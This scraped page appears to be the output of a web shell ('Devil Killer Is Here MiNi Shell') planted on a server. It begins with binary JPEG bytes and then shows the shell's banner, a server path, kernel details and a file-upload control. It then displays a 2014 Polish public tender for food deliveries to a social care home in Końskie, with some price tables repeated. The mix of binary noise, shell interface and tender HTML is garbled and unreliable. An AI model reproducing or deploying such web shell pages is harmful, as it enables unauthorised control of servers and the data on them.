JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20141117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20141117/376320-N-2014.html

<p class="kh_header"><b>Końskie: Sukcesywne dostawy artykułów spożywczych do magazynu DPS Cichy Zakątek w Końskich</b><br>
<b>Numer ogłoszenia: 376320 - 2014; data zamieszczenia: 17.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej Cichy Zakątek , ul. Warszawska 25, 26-200 Końskie, woj. świętokrzyskie, tel. 041 372-51-57, faks 041 372-51-57.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy artykułów spożywczych do magazynu DPS Cichy Zakątek w Końskich.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy artykułów spożywczych do magazynu DPS Cichy Zakątek w Końskich. Wykonawcy mogą złożyć oferty na dowolną ilość części.
Szczegółowy opis przedmiotu zamówienia stanowi kosztorys cenowy oddzielny dla każdej części - załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia.
Zamawiający informuje, że przy dostawie artykułów spożywczych będących przedmiotem zamówienia stosuje prawo opcji, oznacza to, że podane ilości są wielkościami maksymalnymi, które należy wycenić w kosztorysie cenowym.
 Zamawiający, będzie odbierał artykuły sukcesywnie w miarę potrzeb. Natomiast gwarantowana ilość artykułów, które zostaną odebrane to 70 % artykułów wymienionych w kosztorysach cenowych część 1,2,3,5,6 . Gwarantowana ilość artykułów dla części 4 to  50%  
Część 1
 

Kosztorys cenowy na sukcesywne dostawy mięsa, drobiu, wędlin 
L.p.	Nazwa artykułu	Jedn.
miary	Ilość	Cena
brutto	Wartość  ogółem brutto
 
1	2	3	4	5	6
1.		Ćwiartka tylna z kurczaka (udka)	kg	2.100		
2.		Filet z kurczaka 	kg	520		
3.		Flaki wołowe	kg	100		
4.		Karczek   wieprzowy b/k	kg	400		
5.		Kurczaki	kg	120		
6.		Łopatka  wieprzowa b/k  	kg	1.400		
7.		Mięso gulaszowe z kurczaka	kg	100		
8.		Nogi wieprzowe 	kg	300		
9.		Ozory wieprzowe 	kg	75		
10.		Porcje rosołowe  z kurczaka bez  skrzydeł	kg	1.200		
11.		Schab b/k wieprzowy 	kg	300		
12.		Serca drobiowe	kg	       60		
13.		Serca wieprzowe 	kg	       80		
14.		Udziec wołowy  b/k	kg	200		
15.		Wątroba wieprzowa 	kg	80		
16.		Wątróbka z kurczaka	kg	     80		
17.		Żeberka wieprzowe	kg	400		
18.		Żołądki drobiowe	kg	100		
19.		Baleron 	kg	200		
20.		Blok szynkowy	kg	200		
21.		Boczek wędzony gotowany	kg	150		
22.		Kaszanka 	kg	250		
23.		Kiełbasa biała parzona	kg	300		
24.		Kiełbasa dębicka	kg	300		
25.		Kiełbasa krakowska  	kg	300		
26.		Kiełbasa mielonka	kg 	220		
27.		Kiełbasa mortadela	kg	200		
28.		Kiełbasa parówkowa	kg	300		
29.		Kiełbasa podwawelska	kg	400		
30.		Kiełbasa szynkowa   	kg	280		
31.		Parówki drobiowe cienkie	kg	120		
32.		Parówki  wieprzowe cienkie	kg	150		
33.		Pasztet drobiowy 131g	sztuk	3.000		
34.		Pasztet drobiowy pieczony	kg	200		
35.		Pasztetowa wieprzowa 	kg	150		
36.		Pieczeń rzymska	kg	150		
37.		Polędwica drobiowa	kg	280		
38.		Polędwica sopocka	kg	150		
39.		Rolada schabowa	kg	250		
40.		Salceson  wieprzowy	kg	100		
41.		Salceson drobiowy	kg	50		
42.		Szynka drobiowa	kg	220		
43.		Szynka konserwowa	kg	120		
44.		Szynka wieprzowa wędzona gotowana	kg	 200		
45.		Wędzonka krotoszyńska	kg	180		
46.		Słonina b/s	kg	160		
47.		Smalec	kg	150		
Część 2


 
Kosztorys cenowy na sukcesywne dostawy mleka i produktów mleczarskich 
L.p.	Nazwa artykułu	Jedn.
miary	Ilość	Cena
brutto	Wartość
brutto
 
1	2	3	4	5	6
1.		Jogurt naturalny 150g	sztuk	1.400		
2.		Jogurt naturalny 450g	sztuk	200		
3.		Jogurt owocowy 150g	sztuk	5.500		
4.		Kefir 400g	sztuk	450		
5.		Masło ekstra kostka 200g	kg	1.800		
6.		Mleko spożywcze 2 %	l	20.500		
7.		Mleko długoterminowe 2 %	l	500		
8.		Mleko zsiadłe 400g	sztuk	450		
9.		Ser  żółty  (twardy)	kg	250		
10.		Serek homo smakowy150 g	sztuk	4.000		
11.		Serek homo naturalny 150g	sztuk	800		
12.		Serek topiony 100g	sztuk	1.100		
13.		Serek wiejski 200g	sztuk	900		
14.		Śmietana 18  %	l	900		
15.		Twaróg tłusty	kg	1.050		
Część 3
 
Kosztorys cenowy na sukcesywne dostawy pieczywa i wyrobów cukierniczych 
L.p.	Nazwa artykułu	Jedn.
miary	Ilość	Cena
brutto	Wartość
brutto
1	2	3	4	5	6
1.		Bułka 50 g	szt.	44.500		
2.		Bułka 400 g krojona	szt.	4.800		
3.		Bułka 400 g niekrojona	szt.	300		
4.		Bułka grahamka 100 g	szt.	6.500		
5.		Bułka tarta 500g	szt.	200 		
6.		Bułki słodkie 100g (z serem, marmoladą, jabłkiem, jagodami)	szt.	650		
7.		Chleb 1 kg krojony	szt.	10.000		
8.		Chleb razowy 500 g krojony	szt.	2.750		
9.		Rogal bez dodatku cukru 100g	szt.	1.800		
10.		Rogaliki drożdżowe drobne  
z marmoladą wyrób cukierniczy	kg	10		
11.		Ciastka kruche	kg	15		
12.		Pączki 100g	szt.	130		
Część 4
 
Kosztorys cenowy na sukcesywne dostawy różnych artykułów spożywczych.
L.p.	Nazwa  artykułu	Jedn.
miary	Ilość	Cena brutto	Wartość brutto 
1	2	3	4	5	6
1.		Ananasy puszka 565 g	szt.	200		
2.		Barszcz biały w butelce 0,50 l	szt.	650		
3.		Brzoskwinie w puszcze 830g	szt.	100		
4.		Budyń smaki różne 40g	szt.	1.000		
5.		Chrzan 200g	szt.	200		
6.		Cukier	kg	2.700		
7.		Cukier puder 400g	szt.	      40		
8.		Cukier waniliowy 32 g	szt.	50		
9.		Drożdże 100g	szt.	100		
10.		Dżemy różne smaki 280g	szt.	2.400		
11.		Fasola czerwona puszka 400g	szt.	100		
12.		Galaretka owocowa smaki różne 75g	szt.	40		
13.		Gałka muszkatołowa mielona 15 g	szt.	8		
14.		Groszek konserwowy 400g	szt.	400		
15.		Herbata granulowana 100g	szt.	1.500 		
16.		Imbir mielony 20 g	szt.	8		
17.		Kakao 100g	szt.	10		
18.		Kasza jęczmienna	kg	650		
19.		Kasza manna 	kg	200		
20.		Keczup łagodny 500 g	szt.	150		
21.		Kisiel 40g	szt.	1.000		
22.		Koncentrat pomidorowy 30 % 950g	szt.	300		
23.		Kukurydza w puszcze 400g	szt.	    350		
24.		Kwasek cytrynowy 20g	szt.	    150		
25.		Liść laurowy 10g	szt.	120		
26.		Majeranek 10g	szt.	350		
27.		Majonez  600 g lub 600 ml	szt.	400		
28.		Mak 400g	szt.	10		
29.		Makaron gruby 	kg	1.200		
30.		Makaron wstążka - nitka 	kg	500		
31.		Makaron zacierka 0,25 kg	szt. 	750		
32.		Masło roślinne kubek 250g	szt.	1.500		
33.		Mąka pszenna	kg	    1.200		
34.		Mąka tortowa	kg	100		
35.		Mąka ziemniaczana	kg 	    60		
36.		Miód 25g	szt.	5.000		
37.		Musztarda 190 g	szt.	150		
38.		Ocet 0,50 l	szt.	      15		
39.		Ogórek konserwowy  870g/0,90 l	szt.	100		
40.		Olej 1 l 	szt.	750		
41.		Papryka konserwowa  870g/0,90 l	szt.	100		
42.		Papryka słodka 20 g	szt.	150		
43.		Pieprz mielony 15 g	szt.	700		
44.		Płatki jęczmienne 0,40 kg	szt.	    300		
45.		Płatki kukurydziane 0,25 kg	szt.	700		
46.		Płatki owsiane 0,50 kg	szt.	   350		
47.		Proszek do pieczenia 36g	szt.	60		
48.		Przyprawa do potraw 200 g	szt.	1.100 		
49.		Przyprawa w płynie 1 l	szt.	40		
50.		Przyprawa do drobiu 20 g	szt.	50		
51.		Ryż 1 kg	kg	700		
52.		Seler konserwowy słoik 300 g	szt.	250		
53.		Sól jodowana 1 kg	kg	600		
54.		Ziele angielskie 15 g (całe ziarna)	szt.	    250		
55.		Żelatyna 50 g	szt.	      150		
Część 5

  
Kosztorys cenowy na sukcesywne dostawy ryb i konserw rybnych

L.p.	      Nazwa  artykułu	Jedn.
miary	Ilość	Cena 
brutto	Wartość
brutto
 
1	2	3	4	5	6
1.		Filet z miruny ze skórą	kg	700		
2.		Karp filet	kg	15		
3.		Rolmopsy	kg	12		
4.		Śledzie po kaszubsku	kg	150		
5.		Makrela wędzona	kg	300		
6.		Paprykarz szczeciński 130 g	szt.	1.200		
7.		Szprot w oleju 125 g	szt.	1.400		
8.		Szprot w pomidorach 125g	   szt.	2.000		
9.		Śledź po wiejsku	kg	150		
10.		Tuńczyk w sosie własnym 170 g	szt.	300
		
Część 6
 
Kosztorys cenowy na sukcesywne dostawy warzyw i owoców mrożonych 
L.p.	Nazwa  artykułu	Jedn.
miary	Ilość	Cena
brutto	Wartość
brutt0
 
1	2	3	4	5	6
1.		Brokuły mrożone	kg	700		
2.		Fasolka szparagowa mrożona	kg	1.000		
3.		Leczo 	kg	200		
4.		Mieszanka kompotowa 
opak 2,50 kg	kg	1.050		
5.		Mieszanka warzywna 
7 składnikowa	kg	300		
6.		Szpinak mrożony 	kg	50		
7.		Włoszczyzna mrożona paski 	kg	500.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.41.21.00-0, 15.50.00.00-3, 15.81.00.00-9, 15.80.00.00-6, 15.60.00.00-4, 15.33.00.00-0, 15.41.11.00-3, 15.20.00.00-0, 15.33.11.70-9, 15.89.60.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wpłaty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
             Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia wg wzoru   
             załącznik nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
             Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia wg wzoru   
             załącznik nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
             Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia wg wzoru   
             załącznik nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
             Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia wg wzoru   
             załącznik nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
             Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia wg wzoru   
             załącznik nr 4 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1). Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu, 
według wzoru zał. nr 4 do SIWZ 2). W sytuacji, gdy wykonawca będzie polegał na zasobach innych podmiotów zgodnie 
z art. 26 ust. 2b ustawy PZP zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.
Z dokumentu winno wynikać jednoznacznie o wyrażeniu woli udzielenia wykonawcy odpowiedniego zasobu, w jaki sposób te zasoby zostaną wykorzystane przy wykonaniu zamówienia, jakiego charakteru stosunki łączą wykonawcę z innym podmiotem, w jakim zakresie i w jakim okresie inny podmiot będzie brał udział w wykonaniu zamówienia.
 
3). Jeżeli w kraju zamieszkania osoby, lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio dla miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub przed notariuszem - wystawione 
z odpowiednia datą wymaganą dla tych dokumentów.
4). upoważnienie dla osób reprezentujących wykonawcę, a jeżeli wykonawcę reprezentuje  
     pełnomocnik - także pełnomocnictwo, określające zakres umocowania podpisane przez osoby   
     uprawnione do reprezentowania wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.konecki.wrota-swietokrzyskie.pl/web/guest/dps_konskie_zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej Cichy Zakątek ul. Warszawska 25 26-200 Końskie, Dział Żywienia.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.12.2014 godzina 10:30, miejsce: Dom Pomocy Społecznej Cichy Zakątek ul. Warszawska 25 26-200 Końskie Dział Techniczno - Gospodarczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Mięso, drób, wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kosztorys cenowy na sukcesywne dostawy mięsa, drobiu, wędlin 
L.p.	Nazwa artykułu	Jedn.
miary	Ilość	Cena
brutto	Wartość  ogółem brutto
 
1	2	3	4	5	6
1.		Ćwiartka tylna z kurczaka (udka)	kg	2.100		
2.		Filet z kurczaka 	kg	520		
3.		Flaki wołowe	kg	100		
4.		Karczek   wieprzowy b/k	kg	400		
5.		Kurczaki	kg	120		
6.		Łopatka  wieprzowa b/k  	kg	1.400		
7.		Mięso gulaszowe z kurczaka	kg	100		
8.		Nogi wieprzowe 	kg	300		
9.		Ozory wieprzowe 	kg	75		
10.		Porcje rosołowe  z kurczaka bez  skrzydeł	kg	1.200		
11.		Schab b/k wieprzowy 	kg	300		
12.		Serca drobiowe	kg	       60		
13.		Serca wieprzowe 	kg	       80		
14.		Udziec wołowy  b/k	kg	200		
15.		Wątroba wieprzowa 	kg	80		
16.		Wątróbka z kurczaka	kg	     80		
17.		Żeberka wieprzowe	kg	400		
18.		Żołądki drobiowe	kg	100		
19.		Baleron 	kg	200		
20.		Blok szynkowy	kg	200		
21.		Boczek wędzony gotowany	kg	150		
22.		Kaszanka 	kg	250		
23.		Kiełbasa biała parzona	kg	300		
24.		Kiełbasa dębicka	kg	300		
25.		Kiełbasa krakowska  	kg	300		
26.		Kiełbasa mielonka	kg 	220		
27.		Kiełbasa mortadela	kg	200		
28.		Kiełbasa parówkowa	kg	300		
29.		Kiełbasa podwawelska	kg	400		
30.		Kiełbasa szynkowa   	kg	280		
31.		Parówki drobiowe cienkie	kg	120		
32.		Parówki  wieprzowe cienkie	kg	150		
33.		Pasztet drobiowy 131g	sztuk	3.000		
34.		Pasztet drobiowy pieczony	kg	200		
35.		Pasztetowa wieprzowa 	kg	150		
36.		Pieczeń rzymska	kg	150		
37.		Polędwica drobiowa	kg	280		
38.		Polędwica sopocka	kg	150		
39.		Rolada schabowa	kg	250		
40.		Salceson  wieprzowy	kg	100		
41.		Salceson drobiowy	kg	50		
42.		Szynka drobiowa	kg	220		
43.		Szynka konserwowa	kg	120		
44.		Szynka wieprzowa wędzona gotowana	kg	 200		
45.		Wędzonka krotoszyńska	kg	180		
46.		Słonina b/s	kg	160		
47.		Smalec	kg	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.41.21.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Mleko i produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kosztorys cenowy na sukcesywne dostawy mleka i produktów mleczarskich 
L.p.	Nazwa artykułu	Jedn.
miary	Ilość	Cena
brutto	Wartość
brutto
 
1	2	3	4	5	6
1.		Jogurt naturalny 150g	sztuk	1.400		
2.		Jogurt naturalny 450g	sztuk	200		
3.		Jogurt owocowy 150g	sztuk	5.500		
4.		Kefir 400g	sztuk	450		
5.		Masło ekstra kostka 200g	kg	1.800		
6.		Mleko spożywcze 2 %	l	20.500		
7.		Mleko długoterminowe 2 %	l	500		
8.		Mleko zsiadłe 400g	sztuk	450		
9.		Ser  żółty  (twardy)	kg	250		
10.		Serek homo smakowy150 g	sztuk	4.000		
11.		Serek homo naturalny 150g	sztuk	800		
12.		Serek topiony 100g	sztuk	1.100		
13.		Serek wiejski 200g	sztuk	900		
14.		Śmietana 18  %	l	900		
15.		Twaróg tłusty	kg	1.050.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pieczywo i wyroby cukiernicze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kosztorys cenowy na sukcesywne dostawy pieczywa i wyrobów cukierniczych 
L.p.	Nazwa artykułu	Jedn.
miary	Ilość	Cena
brutto	Wartość
brutto
1	2	3	4	5	6
1.		Bułka 50 g	szt.	44.500		
2.		Bułka 400 g krojona	szt.	4.800		
3.		Bułka 400 g niekrojona	szt.	300		
4.		Bułka grahamka 100 g	szt.	6.500		
5.		Bułka tarta 500g	szt.	200 		
6.		Bułki słodkie 100g (z serem, marmoladą, jabłkiem, jagodami)	szt.	650		
7.		Chleb 1 kg krojony	szt.	10.000		
8.		Chleb razowy 500 g krojony	szt.	2.750		
